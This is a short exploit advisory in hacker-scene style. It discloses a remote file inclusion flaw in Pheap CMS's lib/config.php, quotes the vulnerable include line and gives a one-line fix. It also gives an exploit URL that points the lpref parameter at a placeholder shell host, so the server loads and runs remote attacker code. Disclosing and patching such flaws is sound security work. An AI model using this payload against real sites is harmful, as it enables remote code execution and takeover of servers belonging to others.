#============================================================================================== #Pheap CMS<= (lpref) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://pheap.barekoncept.com/ # # #================================================================================================ #Bug in : pheap/lib/config.php # #Vlu Code : #-------------------------------- # <? # # include($lpref."lib/globals.php"); # #================================================================================================ # #Solution : # # Insert in config.php $lpref = "pheap"; # soory guys ... u willn't find any variable sites coz the scripts very new ;) # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/pheap/lib/config.php?lpref=http://SHELLURL.COM? # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior ==================================================================================================